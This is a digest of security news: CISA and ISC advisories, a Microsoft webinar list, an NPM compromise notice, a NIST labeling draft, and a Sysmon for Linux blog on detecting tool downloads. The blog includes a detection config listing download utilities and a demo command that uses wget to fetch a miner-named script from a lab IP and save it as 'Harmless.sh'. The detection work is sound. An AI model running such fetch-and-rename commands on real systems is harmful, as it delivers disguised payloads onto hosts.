CISA and FBI Release Alert on Active Exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus

Original release date: December 2, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory identifying active exploitation of a vulnerability—CVE-2021-44077—in Zoho ManageEngine ServiceDesk Plus. CVE-2021-44077 is an unauthenticated remote code execution vulnerability that affects all ServiceDesk Plus versions up to, and including, version 11305.

This vulnerability was addressed by the update released by Zoho on September
16, 2021 for ServiceDesk Plus versions 11306 and above. If left unpatched,
successful exploitation of the vulnerability allows an attacker to upload
executable files and place webshells that enable post-exploitation activities,
such as compromising administrator credentials, conducting lateral movement,
and exfiltrating registry hives and Active Directory files. Zoho has set up a security response plan center that provides additional details, a
downloadable tool that can be run on potentially affected systems, and a
remediation guide.

CISA encourages organizations to review the joint Cybersecurity Advisory and apply the recommended mitigations immediately.

Drupal Releases Security Updates

 Drupal has released security updates to address vulnerabilities that could
affect versions 8.9, 9.1, and 9.2. An attacker could exploit these
vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review Drupal Security Advisory SA-CORE-2021-011 and apply
the necessary updates.

Microsoft Recordings | Security Community Webinars

AZURE COMPUTE

2021
Feb 3 - Confidential computing nodes on Azure Kubernetes Service (YouTube, Deck)

AZURE NETWORK SECURITY

2021
May 20 - Using Attack Simulation to Assess Protection and Detection Capabilities of Azure WAF (YouTube, Deck)
May 11 - Central DNS Management and Logging with Azure Firewall (YouTube, Deck)
May 6 - Exploring IDPS Capability in Azure Firewall Premium (YouTube, Deck)
May 4 - Using Azure WAF Policies to Protect Your Web Application at Different Association Levels (YouTube, Deck)
Apr 27 - Safeguards for a Successful Azure DDoS Protection Standard Deployment (YouTube, Deck)
Apr 6 - Content Inspection Using TLS Termination with Azure Firewall Premium (YouTube, Deck)

2020
Dec 10 - Azure Network Security Advanced Architecture (YouTube, Deck)
Dec 8 - Azure Network Security for SOCs (YouTube, Deck)
Dec 3 - Getting started with Azure Firewall Manager (YouTube, Deck)
Dec 1 - Manage application and network connectivity with Azure Firewall (YouTube, Deck)
Nov 12 - Boosting your Azure Web Application (WAF) deployment (YouTube, Deck)
Nov 10 - Getting started with Azure Distributed Denial of Service (DDoS) Protection (YouTube, Deck)
Oct 27 - Protecting your web apps with Azure Web Application Firewall (WAF) (YouTube, Deck)
Oct 15 - Introduction to Azure Network Security (YouTube, Deck)

AZURE PURVIEW

2021
Jul 29 - Discover Multi Cloud Data in Purview (YouTube, Deck)
Jun 17 - Better Together: E2E Sensitivity Label Flow from M365 to Azure Purview to SQL to Power BI (YouTube, Deck)
Jan 27 - Introduction to Azure Purview (YouTube, Deck)

MICROSOFT 365 DEFENDER

2021
Oct 11 - l33tSpeak: Advanced Hunting in Microsoft 365 Defender (YouTube, Demo)
Sep 15 - Webinar Series: Monthly Threat Insights (YouTube, Deck)
Aug 18 - Webinar Series: Monthly Threat Insights (YouTube, Deck)
Jul 29 - Introduction to Microsoft Defender Application Guard for Office (YouTube, Deck)
Jul 21 - Webinar series: Monthly Threat Insights (YouTube, Deck)
Jul 12 - The story behind eSentire MDR with Microsoft 365 Defender: How eSentire streamlined security for itself and its customers (YouTube, Deck)
Jun 16 - Webinar series: Monthly Threat Insights (YouTube, Deck)
May 10 - l33tSpeak: Advanced Hunting in Microsoft 365 Defender (YouTube, GitHub)
May 3 - Microsoft 365 Defender’s Unified Experience for XDR (YouTube, Deck)
Feb 22 - What Tracking an Attacker Email Infrastructure Tells Us About Persistent Cybercriminal Operations (YouTube, Deck)
Jan 28 - Protect, Detect, and Respond to Solorigate using Microsoft 365 Defender (YouTube, Deck)

2020
Nov 17 - l33tSpeak | Advanced hunting in Microsoft 365 Defender (YouTube, Demo)
Aug 5 - Advanced Hunting series – Episode 4: Let’s hunt! Applying KQL to incident tracking (YouTube, Demo)
Jul 29 - Advanced Hunting series – Episode 3: Summarizing, Pivoting, and Visualizing Data (YouTube, Demo)
Jul 22 - Advanced Hunting series – Tracking the Adversary Episode 2: Joins (YouTube, Demo)
Jul 15 - Advanced Hunting series – Tracking the Adversary Episode 1: KQL Fundamentals (YouTube, Demo)

MICROSOFT DEFENDER FOR CLOUD (formerly Azure Security Center)

2021
Nov 17 - NextGen Multi Cloud CSPM in Microsoft Defender for Cloud (YouTube, Deck)
Nov 16 - Azure Security Ignite 2021 Updates (YouTube, Deck)
Oct 27 - Azure Defender for SQL (YouTube, Deck)
Oct 26 - Manage Your Security Risk and Compliance Requirements with Azure Security Center (YouTube, Deck)
Oct 20 - What’s New in the Last 6 Months (YouTube, Deck)
Oct 5 - Better Together: Azure Defender, Azure Sentinel, and M365 Defender (YouTube, Deck)
Aug 26 - Better Together | Azure Security Center and Microsoft Defender for Endpoint (YouTube, Deck)
Jul 22 - Manejo de Postura de Seguridad de la Nube y Protección de Cargas de Trabajo (Cloud Security Posture Management and Workload Protection) (YouTube, Deck)
May 13 - Azure Workbooks in Security Center (YouTube, Deck)
Apr 29 - Demystifying Azure Defender Once for All (YouTube, Deck)
Apr 28 - Automate(d) Security with Azure Security Center and Logic Apps (YouTube, Deck)
Mar 9 - Azure Defender for Storage (YouTube, Deck)
Feb 23 - Best Practices for Improving Your Secure Score (YouTube, Deck)
Jan 7 - Azure service layers protection (YouTube, Deck)

2020
Dec 7 - Investigating Azure Security Center alerts using Azure Sentinel (YouTube, Deck)
Nov 30 - Azure Defender for SQL Anywhere (YouTube, Deck)
Nov 9 - Ignite 2020 Announcements (YouTube, Deck)
Nov 2 - Enhance IoT Security & Visibility with Azure Defender and Azure Sentinel (YouTube, Deck)
Oct 28 - Multi-Cloud support in Azure Security Center (YouTube, Deck)
Oct 26 - VM Protection (YouTube, Deck)
Mar 11 - Security Benchmark Policy (YouTube, Deck)
Feb 20 - Secure Score enhanced model (YouTube, Deck)

MICROSOFT DEFENDER FOR CLOUD APPS (formerly Microsoft Cloud App Security)

2021
Aug 17 - Protect your Slack Deployment using Microsoft Cloud App Security (YouTube, Deck)
Jun 8 - Protect Your Salesforce Environment Using MCAS (YouTube, Deck)
May 25 - Improve Your AWS Security Posture Using MCAS (YouTube, Deck)
May 12 - Protect Your Box Deployment Using MCAS (YouTube, Deck)
May 11 - How to Protect Your GitHub Environment Using MCAS (YouTube, Deck)

2020
Apr 15 - Enabling Secure Remote Work (YouTube, Deck)

MICROSOFT DEFENDER FOR ENDPOINT

2021
May 18 - Stopping Carbanak+FIN7: Understanding the MITRE Engenuity ATT&CK Results (YouTube, Deck)

2020
Sep 16 - Get started with Microsoft Defender ATP: from zero to hero (YouTube, Deck)
Jul 7 - Deploy MDATP capabilities using a phased roadmap (YouTube, Deck)
Apr 2 - End-to-end security for your endpoints (YouTube, Deck)

MICROSOFT DEFENDER FOR IDENTITY

2021
Oct 6 - Microsoft Defender for Identity’s Latest Detection Capabilities (YouTube, Deck)
Jun 22 - MDI in the Microsoft 365 Security Center (YouTube, Deck)
Jun 1 - Detection Deep Dive with Defender for Identity’s Engineering Experts (YouTube, Deck)
Mar 23 - Proactive Identity Posture Management (YouTube, Deck)

MICROSOFT DEFENDER FOR IoT (formerly Azure Defender for IoT)

2021
Oct 19 - Agent Based Solution for IoT Device (YouTube, Deck)
Jan 20 - Leveraging OT Behavioral Analytics and Zero Trust for OT Cyber Resilience (YouTube, Deck)

2020
Sep 17 - MITRE ATT&CK for ICS: CyberX Demo and Azure IoT/OT Security Deep Dive (YouTube, Deck)

MICROSOFT SENTINEL (formerly Azure Sentinel)

2021
Nov 16 - Create Your Own Microsoft Sentinel Solutions (YouTube, Deck)
Nov 15 - Improving the Breadth and Coverage of Threat Hunting with ADX Support, More Entity Types, and Updated MITRE Integration (YouTube, Deck)
Nov 10 - Decrease Your SOC’s MTTR (Mean Time to Respond) by Integrating Microsoft Sentinel with Microsoft Teams (YouTube, Deck)
Nov 9 - SAP Mini-Series Part 2: Deep Dive – End-to-End Installation of SAP for Microsoft Sentinel (YouTube, Deck)
Nov 8 - Latest Innovations for Microsoft’s Cloud Native SIEM (YouTube, Deck)
Oct 28 - What’s New in Azure Sentinel Automation (YouTube, Deck)
Oct 25 - Explore the Power of Threat Intelligence in Azure Sentinel (YouTube, Deck)
Oct 18 - SAP Mini-Series Part 1: Introduction to Monitoring SAP with Azure Sentinel for Security Professionals (YouTube, Deck)
Oct 11 - Become a Notebooks Ninja – Getting Started with Jupyter Notebooks in Azure Sentinel (YouTube, Deck)
Oct 6 - Turbocharging ASIM: Making Sure Normalization Helps Performance Rather Than Impacting It (YouTube, Deck*)
Sep 29 - Better Together | OT and IoT Attack Detection, Investigation and Response (YouTube, Deck)
Sep 15 - What’s New in the Last 6 Months (YouTube, Deck)
Sep 14 - Learn About Customizable Anomalies and How to Use Them (YouTube, Deck)
Aug 18 - Fusion ML Detections with Scheduled Analytics Rules (YouTube, Deck)
Aug 11 - Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content (YouTube, Deck)
Jul 28 - The Information Model: Understanding Normalization in Azure Sentinel (YouTube, Deck)
Jul 20 - Streamlining your SOC Workflow with Automated Notebooks (YouTube, Deck)
Jul 13 - Customizing Azure Sentinel with Python – MSTICPy and Jupyter Notebooks (YouTube, Deck)
Jun 29 - Threat Intelligence in Action with Anomali (YouTube, Deck)
Jun 24 - Cost Management in Azure Sentinel – Getting the Most for Your Investment (YouTube, Deck)
May 26 - Deep Dive into Azure Sentinel Innovations for RSA 2021 (YouTube, Deck)
Mar 31 - Using Azure Data Explorer as Your Long Term Retention Platform of Azure Sentinel Logs (YouTube, Deck)
Mar 18 - Data Collection Scenarios (YouTube, Deck)
Feb 18 - Best Practices for Converting Detection Rules from Splunk, QRadar, and ArcSight to Azure Sentinel Rules (YouTube, Deck)
Feb 4 - Accelerate Your Azure Sentinel Deployment with the All-in-One Accelerator (YouTube, Deck)
Jan 21 - Auditing and monitoring your Azure Sentinel workspace (YouTube, Deck)
Jan 19 - Azure Notebooks Fundamentals – How to get started (YouTube, Deck)
Jan 12 - Machine Learning detections in the AI-infused Azure Sentinel SIEM (YouTube, Deck)

2020
Sep 30 - Unleash your Azure Sentinel automation Jedi tricks and build Logic Apps Playbooks like a Boss (YouTube, Deck)
Sep 29 - Enabling User and Entity Behavior Analytics (UEBA) | Hunting for Insider Threats (YouTube, Deck)
Sep 14 - Empowering the Azure Sentinel Community with Pre-Recorded Datasets for research and training purposes (YouTube, Deck)
Sep 9 - KQL part 3 of 3 – Optimizing Azure Sentinel KQL queries performance (YouTube, Deck)
Sep 2 - Log Forwarder deep dive | Filtering CEF and Syslog events (YouTube, Deck)
Aug 19 - Threat intelligence automation with RiskIQ (YouTube, Deck)
Aug 12 - Threat hunting and reduce dwell times with Azure Sentinel (YouTube, Deck)
Jul 28 - KQL part 2 of 3: KQL hands-on lab exercises (YouTube, Deck*)
Jul 9 - Workbooks deep dive – Visualize your security threats and hunts (YouTube, Deck)
Jun 23 - Multi-tenant investigations (YouTube, Deck)
Jun 15 - Deploying and Managing Azure Sentinel as Code (YouTube, Deck)
Jun 2 - KQL part 1 of 3: Learn the KQL you need for Azure Sentinel (YouTube, Deck*)
May 13 - Using Sigma to accelerate your SIEM transformation to Azure Sentinel (YouTube, Deck)
Apr 22 - Threat Hunting on AWS using Sentinel (YouTube, Deck)
Apr 20 - MSSP and Distributed Organization Support (YouTube, Deck)
Mar 31 - Extending and Integrating Azure Sentinel (APIs) (YouTube, Deck*)
Mar 18 - Deep Dive on Threat Intelligence (YouTube, Deck)
Mar 4 - Recap of RSA 2020 (YouTube, Deck)
Feb 19 - Tackling Identity (YouTube, Deck*)
Feb 12 - Deep Dive on Correlation Rules (YouTube, Deck*)
Jan 29 - Threat Hunting – revisited (YouTube, Deck)
Jan 22 - End-to-End SOC scenario (YouTube, Deck)

MICROSOFT MISCELLANEOUS SECURITY WEBINARS

CYBERSECURITY FUNDAMENTALS

2021
Oct 21 - Hacking AI with Counterfit (YouTube, Deck)
Oct 14 - Exploiting Vulnerabilities in Azure Stack Hub (Note: All exploits discussed during the webinar have been addressed.) (YouTube, Deck)
Oct 7 - Combating Manipulated Media - Media Provenance (YouTube, Deck)
Jul 1 - Spa Treatments: Web Security in Single Page Applications (YouTube, Deck)
Jun 15 - Best Practices of Authentication & Authorization Methods (YouTube, Deck)
Mar 24 - Who Wants a Thousand Free Puppies? Managing Open Source Software Security in The Enterprise (YouTube, Deck)
Feb 16 - The Billion-Dollar Central Bank Heist (YouTube, Deck)

2020
Dec 9 - Microsoft Digital Defense Report (YouTube, Deck)
Oct 29 - Cybersecurity Basics: Securing Yourself (YouTube, Deck)

DIVERSITY IN CYBERSECURITY

2021
Oct 4 - Mekonnen Kassa: From a Refugee to Microsoft: Impact of Active Allyship (YouTube, Deck)
May 27 - Sarah Young: How Unconventional Career Paths are Making a Difference in the Technology (YouTube, Deck)
Mar 16 - Sue Loh, software engineer at Microsoft and author of the young adult hacker novel Raven, inspires girls and other under-represented groups to enter tech. (YouTube, Deck)

MITRE ATT&CK technique coverage with Sysmon for Linux

Thanks to Kevin Sheldrake, Roberto Rodriguez, Jessen Kurien and Ofer Shezaf for making this blog possible.

 

For many years, people have been using Sysmon on their Windows systems to gain clarity on what is
happening on their machines and, for the security community, to highlight when
suspicious or malicious activity occurs. Collecting events from individual
hosts is crucial to ensuring you have the visibility needed to identify and
respond to malicious events and Sysmon provides a way to do just that. With the
introduction of Sysmon for Linux, that same clarity is available for many Linux
distros.  While we won’t be detailing all the available Sysmon for Linux
capabilities in this post, you can find the Sysmon documentation here,
read about how to deploy Sysmon in conjunction with Azure Sentinel, look at a
quick guide on how you can use Sysmon in conjunction with Azure Sentinel, or look through
our GitHub repository where we’ve been experimenting with Sysmon configs for Linux.

 

To frame the conversation around how Sysmon for Linux (shortened to Sysmon
from here on out) can be used to create clarity for security teams, we will
walk through how Sysmon events can be used to spot a specific MITRE ATT&CK
technique. The MITRE ATT&CK Matrix (Linux-focused version here) is a well-known and respected framework that many
organizations use to think about adversary techniques and assess detection
coverage. Just like on the Windows side, Sysmon can be used to highlight
tactics and techniques across the matrix. In this blog, we will focus in on the
Ingress Tool Transfer technique (ID T1105)
and highlight a couple of the Sysmon events that can be used to see it. We
observe this technique being used against Linux systems and sensor networks
regularly, and while we have tools to alert on this activity, it is still a
good idea to ensure you have visibility into the host so you can investigate
attacks. To look at this technique, we will show how to enable collection of
three useful events, what those events look like when they fire, and how they
can help you understand what happened. Additionally, we will show what those
events look like in Azure Sentinel.

 

Ingress Tool Transfer (T1105)

It is common to see attackers taking advantage of initial access to a
machine by downloading a script or piece of malware. While “living off the
land” is still something to watch for, in attacks on our customers and against
our sensor network we see attempts to download tools very frequently.  In
fact, the MITRE ATT&CK page for Ingress Tool Transfer shows 290 different pieces of malware and activity groups that use
this technique, so it is a good place to start showing how Sysmon can help add
coverage to different ATT&CK techniques.

 

For this example, we will focus on the five most commonly used tools for
downloading scripts and malware that we’ve seen run on our sensor networks. We
will look for wget, curl, ftpget, tftp, and lwp-download. You may want to
customize this list for your environment, but this will cover the majority of
what we see.

 

Create your Sysmon configuration file

Just like Sysmon for Windows, you will want to create configuration files
based on the system you are wanting to collect logs for based on the role of
the system, your environment, and your collection requirements. The basics of
how to write and run a configuration can be found on the Sysmon documentation page and you can see some examples in
the MSTIC-Sysmon repo, so we’ll just focus on what we need for this specific technique. One
thing to note is that the Event IDs are consistent between Windows and Linux so
Event ID 1 represents process creation events in both environments.

 

We are interested in seeing when an attacker tries to download files to our
computer. There are a few ways we can see that behavior reflected. To begin, we
know that a process will have to get created to start the download. We also
know that a network connection will have to be made and, if the attacker is
successful, a file will be written. Lucky for us, Sysmon has us covered for all
three of these with ProcessCreate, NetworkConnect, and FileCreate events.

 

Below is a basic configuration that we can use to create those events based
on our list of the commonly used tools (it is available in our repo here). You can see we have
separate sections for each of the events we want and have said we want to
include the listed matches.  The tool name will be in the “Image” field,
and we’ve used “end with” because we generally expect to see file paths there
(ex. /bin/wget).

 

<!--
  Created: 10/15/2021  Modified: 10/17/2021
  Technique: Ingress Tool Transfer
  References:
    - https://attack.mitre.org/techniques/T1105/
-->
<Sysmon schemaversion="4.81">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or">
          <Image condition="end with">wget</Image>
          <Image condition="end with">curl</Image>
          <Image condition="end with">ftpget</Image>
          <Image condition="end with">tftp</Image>
          <Image condition="end with">lwp-download</Image>
        </Rule>
      </ProcessCreate>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="include">
        <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or">
          <Image condition="end with">wget</Image>
          <Image condition="end with">curl</Image>
          <Image condition="end with">ftpget</Image>
          <Image condition="end with">tftp</Image>
          <Image condition="end with">lwp-download</Image>
        </Rule>
      </NetworkConnect>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <FileCreate onmatch="include">
        <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or">
          <Image condition="end with">wget</Image>
          <Image condition="end with">curl</Image>
          <Image condition="end with">ftpget</Image>
          <Image condition="end with">tftp</Image>
          <Image condition="end with">lwp-download</Image>
        </Rule>
      </FileCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

 

One thing to note is that both ProcessCreate and ProcessTerminate are
enabled by default.  If you don’t want to collect one of those, you’ll
need an empty “include” statement. Once you have your configuration
created and enabled, you’ll start seeing events.

 

Raw Sysmon events

The Sysmon logs can be found in /var/log/syslog. While you could just look at the raw events there, the SysmonLogView tool makes them easier to read: it takes the Sysmon events and displays them in the more human-readable format you can see below. The following command pipes new events from syslog into sysmonLogView:

 

sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView

 

This gives us a running view of what events are being created. We can then
run the below command to trigger the rules.

wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh

This command will use wget to call out to a server at 10.0.5.8 port 7000,
download the xmrigAttackDemo.sh script, and save it as the script Harmless.sh.
xmrigAttackDemo.sh is an internal testing script that I used for this demo.

 

ProcessCreate (Event ID 1):

You can see we get quite a lot of information from the ProcessCreate event.
We can see wget in the Image field, the full Command Line, the Current
Directory, and the user. You also get Parent Process information although it
isn’t as interesting in this example.

 

Event SYSMONEVENT_CREATE_PROCESS
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.533
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  FileVersion: -
  Description: -
  Product: -
  Company: -
  OriginalFileName: -
  CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh
  CurrentDirectory: /home/testUser
  User: testUser
  LogonGuid: {23b1b3a6-0000-0000-e903-000000000000}
  LogonId: 1001
  TerminalSessionId: 38
  IntegrityLevel: no level
  Hashes: -
  ParentProcessGuid: {23b1b3a6-8ed2-6153-0824-7cafd1550000}
  ParentProcessId: 13408
  ParentImage: /bin/bash
  ParentCommandLine: bash

 

NetworkConnect (Event ID 3):

In the NetworkConnect event, we again see wget in the Image field and the
user. We also see the protocol, source and destination IP addresses, and the
ports involved. Our example command line has the IP listed already so it isn’t
new information, but it could be useful in tying the different logs together.
You’ll notice the Process IDs also match up as expected.

 

Event SYSMONEVENT_NETWORK_CONNECT
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.543
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  User: testUser
  Protocol: tcp
  Initiated: true
  SourceIsIpv6: false
  SourceIp: 10.0.5.10
  SourceHostname: -
  SourcePort: 40680
  SourcePortName: -
  DestinationIsIpv6: false
  DestinationIp: 10.0.5.8
  DestinationHostname: -
  DestinationPort: 7000
  DestinationPortName: -

 

FileCreate (Event ID 11):

Here we can again see the wget tool and the process Id. We also have the
name of the file that was created and its file path.

 

Event SYSMONEVENT_FILE_CREATE
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.536
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  TargetFilename: /home/testUser/Harmless.sh
  CreationUtcTime: 2021-09-28 21:53:22.536
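The three events above share a ProcessGuid, which is what lets you tie the process, its network connection and the file it wrote into one picture. As an added example (not code from Sysmon or from the original post), the following Python script parses sysmonLogView-style records, groups them by ProcessGuid, and emits one T1105 summary per process whose Image is one of the download tools from the config; the sample records are constructed from the values shown above plus an unrelated process that should not be flagged.

```python
"""Correlate Sysmon for Linux ProcessCreate (1), NetworkConnect (3) and
FileCreate (11) events by ProcessGuid to reconstruct an Ingress Tool
Transfer (T1105) download. Added example; not part of Sysmon or the post."""
import os
from collections import defaultdict

# Download tools from the page's Sysmon config; extend for your environment.
T1105_TOOLS = {"wget", "curl", "ftpget", "tftp", "lwp-download"}

# Constructed sample: sysmonLogView-style records shaped like the three shown
# above (one "Key: value" field per line), plus an unrelated 'ls' process.
SAMPLE_LOG = """\
Event SYSMONEVENT_CREATE_PROCESS
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.533
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh
  CurrentDirectory: /home/testUser
  User: testUser
  ParentProcessId: 13408
  ParentImage: /bin/bash
  ParentCommandLine: bash
Event SYSMONEVENT_FILE_CREATE
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.536
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  TargetFilename: /home/testUser/Harmless.sh
  CreationUtcTime: 2021-09-28 21:53:22.536
Event SYSMONEVENT_NETWORK_CONNECT
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.543
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  User: testUser
  Protocol: tcp
  Initiated: true
  SourceIp: 10.0.5.10
  SourcePort: 40680
  DestinationIp: 10.0.5.8
  DestinationPort: 7000
Event SYSMONEVENT_CREATE_PROCESS
  RuleName: -
  UtcTime: 2021-09-28 21:55:01.000
  ProcessGuid: {23b1b3a6-8f35-6153-1111-222233330000}
  ProcessId: 13500
  Image: /usr/bin/ls
  CommandLine: ls -la
  User: testUser
"""


def parse_events(text):
    """Split sysmonLogView output into a list of {field: value} dicts.
    Each 'Event <TYPE>' header starts a new record ('EventType' field)."""
    events, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Event "):
            current = {"EventType": line.split(None, 1)[1]}
            events.append(current)
        elif current is not None and ": " in line:
            key, value = line.split(": ", 1)
            current[key.strip()] = value.strip()
    return events


def correlate_t1105(events):
    """Return one summary per process whose Image is a known download tool,
    joining its network connections and created files by ProcessGuid."""
    by_guid = defaultdict(list)
    for ev in events:
        by_guid[ev.get("ProcessGuid")].append(ev)

    findings = []
    for guid, group in by_guid.items():
        creates = [e for e in group if e["EventType"] == "SYSMONEVENT_CREATE_PROCESS"]
        if not creates:
            continue  # no Event ID 1 for this GUID: nothing to attribute
        proc = creates[0]
        tool = os.path.basename(proc.get("Image", ""))
        if tool not in T1105_TOOLS:
            continue
        findings.append({
            "guid": guid,
            "tool": tool,
            "user": proc.get("User"),
            "command": proc.get("CommandLine"),
            "parent": proc.get("ParentImage"),
            "destinations": [f"{e['DestinationIp']}:{e['DestinationPort']}"
                             for e in group
                             if e["EventType"] == "SYSMONEVENT_NETWORK_CONNECT"],
            "files": [e["TargetFilename"] for e in group
                      if e["EventType"] == "SYSMONEVENT_FILE_CREATE"],
        })
    return findings


if __name__ == "__main__":
    for f in correlate_t1105(parse_events(SAMPLE_LOG)):
        print(f"[T1105] {f['user']} ran {f['tool']} via {f['parent']}: {f['command']}")
        print(f"        connected to {', '.join(f['destinations'])}; "
              f"wrote {', '.join(f['files'])}")
```

Feeding it the live stream (`sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView`) instead of the sample needs only a line-buffered reader; the grouping logic is unchanged.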

 

Viewing in Azure Sentinel

Sysmon events are pushed to Syslog so if you are collecting Syslog events
from your Linux machine into Azure Sentinel, you will get the Sysmon
events.  For more details on how to make that connection, check out the
documentation here.  Also, as the Sysmon events come through with
most of the data in the Syslog Message field, you’ll need to parse out the
fields you are interested in.  Fortunately, the Azure Sentinel Information Model parsers have you covered.
You can install the Parsers from the link here. Once you do, you’ll have access to functions that
have taken the guesswork out of parsing.

 

The parsing functions are available under Functions-> Workspace
functions. In the below, you can see the Linux Sysmon functions we currently
have.

[Screenshot: Linux Sysmon parser functions listed under Functions > Workspace functions]

 

Using the function vimProcessCreateLinuxSysmon, we can see our event reflected.
We have narrowed the query to just the event in the example above and chosen to
project only a couple of the columns of data.

[Screenshot: vimProcessCreateLinuxSysmon query results for the example event]

From here you can start to include Sysmon as a data source for your hunting
queries and analytics.

 

Sysmon for Linux and MITRE ATT&CK

While we didn’t dig into all the possible Sysmon events or ATT&CK techniques, hopefully you can see how you can use Sysmon to collect data that will highlight adversary techniques. Sysmon is open source and available in the Sysinternals GitHub. If you have requests or find bugs, check out the Sysmon for Linux project page for the best ways to contact the team. MSTIC has been working with different configs and has started a repo here to share with the community. If you want to see other configs based on MITRE ATT&CK techniques, check them out here and feel free to add suggestions of your own. If you want a config that has all the techniques we’ve mapped so far, you can find it here. We will continue to come up with new ways to utilize the logs in Azure Sentinel and we look forward to seeing what the community develops. If the amazing work around the Windows version is any indication, we expect that the future of Linux logging is bright.

 

Original post here

Security Advisory for BIND

ISC Releases Security Advisory for BIND

10/28/2021 12:05 PM EDT

Original release date: October 28, 2021

The Internet Systems Consortium (ISC) has released a security advisory that
addresses a vulnerability affecting multiple versions of the ISC Berkeley
Internet Name Domain (BIND). A remote attacker could exploit this vulnerability
to cause a denial-of-service condition.

CISA encourages users and administrators to review the ISC advisory for CVE-2021-25219 and apply the necessary updates or workaround.

JavaScript NPM Library Compromised

Hackers have compromised a JavaScript NPM library with password-stealing malware. The library, UAParser.js, garners 6 million downloads a week. The threat came after hackers hijacked UAParser.js’s NPM account. GitHub has warned users that any device with the package installed should be considered compromised.

Microsoft Information Protection (MIP) Ninja Training is Here

 We are very excited and pleased to announce this rendition of the Ninja Training Series. With all the other training out there, our team has been working diligently to get this content out there. There are several videos and resources out there and the overall purpose of the MIP Ninja training is to help you master this realm. We aim to get you up-to-date links to the community blogs, training videos, Interactive Guides, learning paths, and any other relevant documentation. 

 

To make it easier for you to start and advance your knowledge gradually without throwing you in deep waters, we split content in each offering into three levels: beginner, intermediate, and advanced.  

 

In addition, after each section, there will be a knowledge check based on the training material you’d have just finished! Since there’s a lot of content, the goal of these knowledge checks is to help you determine if you were able to get a few of the major key takeaways.  

 

There’ll be a fun certificate issued at the end of the training: Disclaimer: This is NOT an official Microsoft certification and only acts as a way of recognizing your participation in this training content. 

 

Lastly, this training will be updated on a quarterly basis to ensure you all have the latest and greatest material! 


Go here

 

Draft Baseline Criteria for Consumer Software Cybersecurity Labeling

Please Submit Comments: Draft Baseline Criteria for Consumer Software Cybersecurity Labeling

Section 4(s) of the President’s Executive Order (EO) on “Improving the Nation’s Cybersecurity (14028),” issued on May 12, 2021, charges NIST, in coordination with the Federal Trade Commission (FTC) and other agencies, to initiate pilot programs for cybersecurity labeling. These labeling programs are intended to educate the public on the security capabilities of software development practices.

To inform this effort, Sec. 4 (u)
of the EO directs NIST to “…identify secure software development practices or
criteria for a consumer software labeling program.” Furthermore, the identified
criteria “…shall reflect a baseline level of security practices, and if
practicable, shall reflect increasingly comprehensive levels of testing and
assessment that a product may have undergone.” Sec. 4 (u)
also states that “…NIST shall examine all relevant information, labeling, and
incentive programs, employ best practices, and identify, modify, or develop a
recommended label or, if practicable, a tiered software security rating system.
This review shall focus on ease of use for consumers and a determination of
what measures can be taken to maximize participation.”

Today, NIST has released for public comment a document that
advances these tasks: Draft Baseline Criteria for Consumer Software Cybersecurity Labeling.
This draft document addresses the need to develop appropriate cybersecurity
criteria for consumer software—and it informs the development and use of a
label for consumer software which will improve consumers’ awareness,
information, and ability to make purchasing decisions (while taking
cybersecurity considerations into account). This document was developed after
much input from a recent NIST workshop, position papers submitted to NIST,
additional extensive research, and many discussions with experts and
organizations from the public and private sectors.

We are seeking comments on all aspects of the criteria contained
in the draft document (more
details can be found in the ‘note to reviewers’ section of the draft document).
In accordance with the EO, NIST plans to produce a final version of
these criteria by February 6, 2022.

Please view the draft document HERE.

To submit comments, please email them to labeling-eo@nist.gov using
the subject, “Draft Consumer Software Labeling Criteria,” by December
16, 2021.

Azure Active Directory (AD) keyCredential property Information Disclosure

Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.

The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.

The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

